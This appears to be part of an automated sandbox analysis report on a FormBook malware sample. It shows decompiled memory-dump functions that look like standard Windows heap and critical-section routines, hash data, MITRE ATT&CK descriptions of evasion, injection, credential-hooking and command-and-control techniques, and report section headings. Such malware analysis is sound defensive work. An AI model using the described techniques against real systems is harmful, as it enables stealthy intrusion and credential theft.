0x04ffa1a6
0x04ffa1c2
0x00000000
0x00000000
0x00000000
0x04ffa192
0x04ffa192
0x04ffa19f
0x04ffa19f

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbd23ff69b9752fc5ead9d71ec605cb159cd92c41c169e37d7b01e74a90fc70e
Instruction ID: c05bab1cc50f84c9ec4b84027e0b7437ea179b65bd8c9e694da677919dd7d4b6
Opcode Fuzzy Hash: fbd23ff69b9752fc5ead9d71ec605cb159cd92c41c169e37d7b01e74a90fc70e
Instruction Fuzzy Hash: 94D02B215600001BF61C2700FDE4B793226EB84704F310C4DF30B0A5B0DDD2A8D78508

Uniqueness

Uniqueness Score: -1.00%

Function 04FF16E0, Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FF16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04FF1710(0x50b67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L04FE4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x04ff16e8
0x04ff16ef
0x04ff16f3
0x04ff16fe
0x00000000
0x04ff1700
0x04ff170d
0x04ff170d
0x04ff16f2
0x04ff16f2
0x04ff16f2
0x04ff16f2

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1979f4fddb2b5144d37c53eb280bb65780675d70de2019822937da15b9519aba
Instruction ID: 0e55113f9c4383eb698da4ef327e2c506bec19da67a540e3d21ef26357a9b06f
Opcode Fuzzy Hash: 1979f4fddb2b5144d37c53eb280bb65780675d70de2019822937da15b9519aba
Instruction Fuzzy Hash: 4DD05E31140100D3EA2D5A119E44B143255DF80785F38005CB20A594E0DFA2EC93E448

Uniqueness

Uniqueness Score: -1.00%

Function 050453CA, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E050453CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E04FDEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x050453ca
0x050453ce
0x050453d9
0x050453de
0x050453e1
0x050453e1
0x050453e6
0x050453f3
0x00000000
0x050453f8
0x050453fb

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 42e9b0abe1220a073582bfabaf1c455d1523e3ad59a9e60b476d218d52ec3b48
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: BDE08C729047809BCF22EB49DA50F5EB7F5FB44B00F180064A0095F620C624AC01CB00

Uniqueness

Uniqueness Score: -1.00%

Function 04FF35A1, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FF35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E04FDEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}

0x04ff35a1
0x04ff35a1
0x04ff35a5
0x04ff35ab
0x04ff35ab
0x04ff35b5
0x00000000
0x04ff35c1
0x04ff35b7

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction ID: acaef7a12bd0add8ae8623554605ae103803c841b6412b733e94be684c397136
Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
Instruction Fuzzy Hash: F0D0C9329516869BEF51AB50CE1876C77B2BF8031CF5C20659A460A972C33A7A5BD602

Uniqueness

Uniqueness Score: -1.00%

Function 04FDAAB0, Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FDAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x04fdaab6
0x04fdaabb
0x0502a442
0x00000000
0x0502a448
0x0502a454
0x0502a454
0x04fdaac1
0x04fdaac1
0x04fdaac6
0x04fdaac6

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 4a5c5a7cfd3c50fa228550a1ed2b40ab95106c512eaf7fd9347fd20a82895e9a
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: E3D0C939352980CFD616CB0CC554B1933A5BB44B40FC505D0E800CB761E62CE940CA00

Uniqueness

Uniqueness Score: -1.00%

Function 0504A537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0504A537(intOrPtr _a4, intOrPtr _a8) {

				return L04FE8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x0504a553

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: e3cf8cde6ea83a1686fb34fc63a426f4fa4dc73ad82f4a8b4af35f7e11dfafb2
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 15C01232080248BBCB127E82CC00F267F2AEB94BA0F008011BA080B5608632E971EA84

Uniqueness

Uniqueness Score: -1.00%

Function 04FCDB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FCDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L04FE4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x04fcdb4d
0x04fcdb54
0x04fcdb5f
0x04fcdb56
0x04fcdb56
0x04fcdb5c
0x04fcdb5c

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 73ad77549af0250c9eb7f03f7f98fa978800cd766dce73e522f77c45bd43f2ad
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: 6DC08C30280A01AAEB221F20CE01B1076A0BB40B06F4400A46300DA0F0EB78E802EA00

Uniqueness

Uniqueness Score: -1.00%

Function 04FCAD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FCAD30(intOrPtr _a4) {

				return L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x04fcad49

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: 4667e5a01cc8d092a09405be1b291a98b9673a4b60d4103991a2e7bbe497bf3d
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 37C08C32080288BBC7126A46DD00F117B69E790B60F000020B6040A6618932E861D588

Uniqueness

Uniqueness Score: -1.00%

Function 04FD76E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FD76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x04fd76e4
0x00000000
0x04fd76f8
0x04fd76fd

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: 31942bc2269ef1205916c85409e773ea2add15a248854fa6f398e71c4b87d9f3
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: DFC08C705411C85AEB2A7B08CE20B3076D1AB08709F4C02ACAA010D4A1D368B803C208

Uniqueness

Uniqueness Score: -1.00%

Function 04FF36CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FF36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L04FE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x04ff36d2
0x04ff36e8
0x04ff36d4
0x04ff36e5
0x04ff36e5

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: 319e4b94b0d366d8abd9fdb46d07def34861b4bd95102795a9ecec90a1e546e9
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: C1C09B75155440FBEB155F30CD51F25B254FB40A66F6407587321495F0D569BC41D508

Uniqueness

Uniqueness Score: -1.00%

Function 04FE3A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FE3A1C(intOrPtr _a4) {
				void* _t5;

				return L04FE4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x04fe3a35

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 8b2d0fcf7392f6b813e779ec2380d491d899f2e3fce30fef03a4f11bd04a89b5
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: EDC08C32080248BBCB126E42DC00F11BB29E790B60F000020B6040A5608532EC61D98C

Uniqueness

Uniqueness Score: -1.00%

Function 04FE7D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FE7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x04fe7d56
0x04fe7d5b
0x04fe7d60
0x04fe7d5d
0x04fe7d5d
0x04fe7d5d

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 08bfeda6ac0f7abaceb51e561c714a6902fdaa65d8b4ea14bc5b2ef2680f88ef
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: 28B09234301941CFCF26EF19C080B2533E8BB44A40B8400D0E800CBA20D229E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 04FF2ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04FF2ACB() {
				void* _t5;

				return E04FDEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x04ff2adc

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 26450a61823b7a652854d1e1581451e20d7b665264d02e704e1e0ba1ee46a7a1
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 32B01232C10940CFCF02FF40CA10B197332FF00750F09449090012B930C228BC12CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0505FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0505FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0500CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E05055720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E05055720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0505fdda
0x0505fde2
0x0505fde5
0x0505fdec
0x0505fdfa
0x0505fdff
0x0505fe0a
0x0505fe0f
0x0505fe17
0x0505fe1e
0x0505fe19
0x0505fe19
0x0505fe19
0x0505fe20
0x0505fe21
0x0505fe22
0x0505fe25
0x0505fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0505FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0505FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0505FE01

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: aadedf5d9100a3280ebc8aa08ced5ffe7f775b53d1c8078870346da3942fb7c9
Instruction ID: 194cd5d874ac4b37944a4cd7b9b4355610a77c43dcc4dde55bcc9dd3ed81bca0
Opcode Fuzzy Hash: aadedf5d9100a3280ebc8aa08ced5ffe7f775b53d1c8078870346da3942fb7c9
Instruction Fuzzy Hash: 42F0F676240201BFE6211A55EC0AF67BF5AEB45730F254314FA68565D1DA62F86086F0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SKM_C36821010708320.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph